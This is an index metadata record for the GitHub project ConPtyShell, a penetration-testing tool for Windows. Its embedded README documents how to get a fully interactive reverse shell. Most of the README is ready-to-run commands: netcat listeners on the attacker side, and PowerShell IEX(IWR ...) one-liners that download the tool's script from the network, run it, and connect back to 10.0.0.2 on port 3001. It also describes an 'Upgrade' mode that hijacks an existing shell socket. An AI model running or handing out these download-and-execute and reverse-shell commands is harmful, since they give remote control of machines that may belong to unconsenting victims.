{"id":13776088,"url":"https://github.com/antoniococo/conptyshell","last_synced_at":"2025-04-12T18:40:05.885Z","repository":{"id":36156474,"uuid":"208354392","full_name":"antonioCoco/ConPtyShell","owner":"antonioCoco","description":"ConPtyShell - Fully Interactive Reverse Shell for Windows","archived":false,"fork":false,"pushed_at":"2023-01-20T10:52:52.000Z","size":14074,"stargazers_count":1096,"open_issues_count":4,"forks_count":169,"subscribers_count":19,"default_branch":"master","last_synced_at":"2025-04-03T20:12:23.690Z","etag":null,"topics":["conpty","csharp","penetration-testing","powershell","shell","terminal"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/antonioCoco.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-09-13T22:11:18.000Z","updated_at":"2025-04-01T19:20:23.000Z","dependencies_parsed_at":"2023-02-12T01:31:44.624Z","dependency_job_id":null,"html_url":"https://github.com/antonioCoco/ConPtyShell","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/antonioCoco","download_url":"https://codeload.github.com/ant
onioCoco/ConPtyShell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248616377,"owners_count":21134070,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["conpty","csharp","penetration-testing","powershell","shell","terminal"],"created_at":"2024-08-03T17:02:00.058Z","updated_at":"2025-04-12T18:40:05.856Z","avatar_url":"https://github.com/antonioCoco.png","language":"PowerShell","readme":"# ConPtyShell\nConPtyShell is a Fully Interactive Reverse Shell for Windows systems.\n\nThe introduction of the Pseudo Console (ConPty) in Windows has greatly improved the way Windows handles terminals.\nConPtyShell uses this feature to literally transform your bash into a remote powershell.\n\n\u003cp\u003eBriefly, it creates a Pseudo Console and attaches 2 pipes.\u003cbr\u003e\nThen it creates the shell process (default powershell.exe) attaching the Pseudo Console with redirected input/output.\u003cbr\u003e\nThen it starts 2 threads for Async I/O:\u003cbr\u003e\n- one thread for reading from the socket and writing to the Pseudo Console input pipe;\u003cbr\u003e\n- the second thread for reading from the Pseudo Console output pipe and writing to the socket.\u003c/p\u003e\n\nConPtyShell also has the magic flag \"Upgrade\" that transforms your current shell into a fully interactive one, use it if you don't want to use a new connection and want to hijack your current shell socket :)\n\nIf you want to know further information regarding ConPty you can find a great article [1] in the references section.\n\n**NOTE: ConPtyShell uses the function 
\u003ca href=\"https://docs.microsoft.com/en-us/windows/console/createpseudoconsole\"\u003eCreatePseudoConsole()\u003c/a\u003e. This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).**\n\n**NOTE2: If the ConPTY is not available on the target system you will get a normal netcat-like interactive shell.**\n\n## Requirements\n\u003cp\u003eClient Side: Windows version \u003e= 10 / 2019 1809 (build \u003e= 10.0.17763)\u003c/p\u003e\n\u003cp\u003eServer Side: any tcp listener, i.e. netcat\u003c/p\u003e\n\n## Usage\n\nIt's important to have the same rows and cols size between your terminal and the remote terminal if you want to have an aligned output on the shell.\n\n#### Method 1\nIn this method the terminal size is set without passing the rows and cols parameters to the Invoke-ConPtyShell function:\n\n##### Server Side:\n```\nstty raw -echo; (stty size; cat) | nc -lvnp 3001\n```\n\n##### Client Side:\n\n```\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001\n```\n\n#### Method 2\nIf you prefer to have more freedom on the tcp listener and your terminal you can proceed with a \"Manual\" way to get the reverse shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:\n\n##### Server Side:\n```\nstty size\nnc -lvnp 3001\nWait For connection\nctrl+z\nstty raw -echo; fg[ENTER]\n```\n##### Client Side:\nHere you should use the values read from ```stty size``` command in the Parameters -Rows and -Cols\n```\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80\n```\n\n#### Method 3 - Upgrade\nYou can also upgrade your current shell to a fully interactive shell. 
In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:\n\n##### Server Side:\n```\nstty size\nnc -lvnp 3001\nWait For connection\nctrl+z\nstty raw -echo; fg[ENTER]\n```\n##### Client Side:\nHere you should use the values read from ```stty size``` command in the Parameters -Rows and -Cols\n\n```\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -Upgrade -Rows 24 -Cols 80\n```\n\n## Change Console Size\n\nIn any case, if you resize your terminal while the remote shell is already open, you can change the rows and cols size directly from powershell by pasting the following code:\n\n```\n$width=80\n$height=24\n$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)\n$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)\n```\n\n## Demo\nBelow you can watch 2 demos. The first gif shows **Method 1** with the compiled assembly in exe format, the second gif shows **Method 3** by upgrading your current shell with the ps1 script:\n\n#### Method 1\n\n\u003cimg src=\"demo_1.gif\"\u003e\n\n#### Method 3 - Upgrade demo\n\n\u003cimg src=\"demo_2.gif\"\u003e\n\n## References\n\n1. https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/\n2. https://github.com/microsoft/terminal\n3. https://www.usenix.org/conference/usenixsecurity20/presentation/niakanlahiji\n4. 
https://adepts.of0x.cc/shadowmove-hijack-socket/\n\n## Credits\n\n- LupMan\n","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniococo%2Fconptyshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fantoniococo%2Fconptyshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniococo%2Fconptyshell/lists"}